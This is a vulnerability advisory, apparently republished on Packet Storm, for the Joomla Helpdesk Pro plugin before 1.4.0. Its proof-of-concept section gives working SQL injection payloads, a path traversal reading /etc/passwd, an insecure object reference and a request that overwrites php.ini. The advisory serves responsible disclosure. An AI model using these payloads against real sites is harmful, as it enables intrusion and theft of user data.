Lucene search

K
packetstormGregor MynarskyPACKETSTORM:132766
HistoryJul 21, 2015 - 12:00 a.m.

Joomla Helpdesk Pro XSS / File Disclosure / SQL Injection

2015-07-2100:00:00
Gregor Mynarsky
packetstormsecurity.com
36

0.006 Low

EPSS

Percentile

78.5%

`Document Title  
==============  
Joomla! plugin Helpdesk Pro < 1.4.0  
  
Reported By  
===========  
Simon Rawet from Outpost24  
Kristian Varnai from Outpost24  
Gregor Mynarsky from Outpost24  
https://www.outpost24.com/  
  
For full details, see;  
https://www.outpost24.com/outpost24-has-found-critical-vulnerabilities-in-joomla-helpdesk-pro/  
  
  
Tested on  
=========  
All exploits were tested and verified by Outpost24 for HelpDesk Pro  
version 1.3.0. While no official testing has been done on earlier  
versions, all versions prior to 1.4.0, where the issues were finally  
patched, are suspected of being vulnerable.  
  
Release Date  
============  
2015-07-16  
  
CVE  
===  
CVE-2015-4071 CVSS: 4.0 Direct Object References  
CVE-2015-4072 CVSS: 6.5 Multiple XSS  
CVE-2015-4073 CVSS: 7.8 SQL Injection  
CVE-2015-4074 CVSS: 7.8 Local file disclosure/Path traversal  
CVE-2015-4075 CVSS: 6.8 File Upload  
  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2015-05-23: Vulnerabilities discovered and reported to mitre  
2015-05-25: Vendor contacted  
2015-06-21: Vendor released update version: 1.4.0  
2015-07-16: Public disclosure  
  
  
PoC  
===  
  
Direct object references CVE-2015-4071.  
Authenticated  
Path: http://{target}/component/helpdeskpro/?view=ticket&id={ticketId}  
  
It's possible to read other users' support tickets by changing the  
numeric id.  
  
  
XSS CVE-2015-4072.  
Mostly authenticated dependent on site configuration  
Output validation is universally overlooked  
Example: Name and message  
Path:  
http://{target}/index.php?option=com_helpdeskpro&view=ticket&layout=form&Itemid=1  
  
  
SQLi CVE-2015-4073 for both SQLi.  
  
There are 3 SQLi:  
  
Authenticated  
Vulnerable parameter: filter_order  
Path: http://{url}/index.php?option=com_helpdeskpro&view=tickets  
Post data:  
search=&category_id=0&status_id=-1&limit=10&limitstart=0&option=com_helpdeskpro&task=&boxchecked=0&filter_order=SLEEP('10')&filter_order_Dir=DESC  
  
Unauthenticated  
Vulnerable parameter: ticket_code  
Path:  
http://{url}/index.php?option=com_helpdeskpro&view=ticket&ticket_code=1"%20or%20sleep(5)%20%23  
  
Unauthenticated  
Vulnerable parameter: email  
Path: http://{url}/index.php?option=com_helpdeskpro&task=ticket.save  
Post data: name=asdf&[email protected]"%20and%20sleep(5)%20and%20"3"="3  
  
  
Local file disclosure/Path traversal CVE-2015-4074.  
Unauthenticated  
Path:  
https://{url}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe  
  
  
File Upload CVE-2015-4075.  
Unauthenticated  
Path: http://{url}/index.php?option=com_helpdeskpro&task=language.save  
Injected parameter: item, keys, attacker specified  
Post data:  
lang=&item=./../../../../../../etc/php5/apache2/php&keys[]=[PHP];&[PHP];=val%0aAnyData%0a;  
Description: Allows for .ini files to be created wherever the web server  
has write access. If the .ini file already exists and is writable, it  
will be overwritten by the server. In a poorly configured system, this  
will allow for code execution by including applicable arguments in .ini  
files. This however is not applicable to most systems. Any non-protected  
.ini files will be possible to replace, with impact depending per file.  
This PoC will overwrite the file /etc/php5/apache2/php.ini with the content:  
;key="val  
AnyData  
;"  
  
--   
Best Regards,  
-----------------------------------------------------  
Simon Rawet  
Web Application Analyst, Outpost24 AB  
Skeppsbrokajen 8 | 371 33 Karlskrona | Sweden  
T: +46 708 474 323  
---Outpost24 - Vulnerability Management Made Easy!---  
  
  
  
`

0.006 Low

EPSS

Percentile

78.5%